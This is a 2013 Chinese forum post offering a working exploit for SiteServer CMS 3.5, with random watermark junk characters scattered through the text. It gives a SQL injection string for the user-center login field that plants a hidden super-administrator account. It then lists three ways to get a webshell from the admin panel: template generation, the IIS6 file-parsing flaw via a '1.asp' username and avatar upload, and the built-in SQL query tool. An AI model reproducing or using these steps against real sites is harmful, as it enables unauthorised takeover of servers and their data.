经测试秒杀最新的3.5版
, r. b0 h4 {( U, y; S5 h2 Z+ d* Y# f$ K
stieserver官网:www.siteserver.cn
6 o/ J, C3 z4 S0 T3 P3 Y' p/ U9 }: U- [! T; F! g
3 C0 c5 T; z5 y2 p
6 \0 \- w) Z% dEXP:
' u; t9 F+ U S$ `4 s9 K- {" b0 n; V4 D# w% l, Q
直接访问UserCenter/login.aspx3 B7 F# d6 a' t: U/ M; J
/ j! q1 ]% Y2 Z4 B2 k' }9 r6 f
! u. r: I, d+ l( ~8 k' e9 k" D4 j% X3 B1 l! C. L& K
用户名处输入:, [8 c1 z& ^, b0 J: h. m
) a2 E; q$ U/ F) y2 q
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--0 C. ]/ ]1 ^! y# w+ M
% M) O7 P8 {; c
1 s- G$ w7 X/ e+ v4 X. e
1 C4 Z: K e, j7 D! ?密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。4 }! e2 I; l& Y: l9 k( P
; A# j. w+ o Q
, V/ K% m& a$ f; Q" S% O
/ ?- }, N9 j: i0 q( B) }
之后再访问后台SiteServer/login.aspx用插入的用户登陆
9 y9 q9 N, p; O8 `
3 q# h2 U8 i6 S
7 k0 h2 y/ u1 V& P. L# [
9 M0 K# p, O2 ~2 V后台拿webshell的三种方法:
* e4 v! ?0 `6 T6 ^5 V
& @% y4 ]! \9 T n# Z$ G8 F0 p; X一、' e! i- ?" M' a
4 d; Z: Q! |# ]6 o
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
( g, o5 x8 y! s0 |3 H* f) D. n8 l7 C0 y9 l: ?% r1 \
二、. `7 P* y2 F1 o' F
$ \7 F# l* r( |2 m. Q4 n) c成员权限-》添加用户-》用户名为:1.asp
' L4 a! f n/ ?; d+ T" Z2 b3 ^0 m# ~* k3 v) ?% Q$ A+ z% J
http://127.0.0.1/usercenter/" S- [, ~6 G* P0 s7 F x
. q4 U6 K. b# X
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell/ y1 M0 \! d+ A' m% x" S
! L1 t* j, ~: S. m
(ps:后台添加用户时不会验证是否含有非法字符)
R- I: d4 b) q3 d9 M0 J. W# n# w& q0 z$ H6 Z
三、5 z- K$ K" q) J1 N4 e! Z# [$ X
8 Z$ H T& E+ S系统工具-》实用工具-》机器参数查看6 x1 o- A* }9 c6 S4 C
可以看到数据库类型、名称,WEB路径
% z9 y6 `1 }; K3 M: g6 ?' d! X% J' d6 r5 g( Z( {
系统工具-》数据库工具-》SQL语句查询 W4 y+ N9 m- [( E- H/ d# ]% O
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
( Y3 z1 D4 p1 R* j4 @' R9 x! L, A* w+ v$ |
|
发表于 2013-1-11 21:10:58
收藏
支持
反对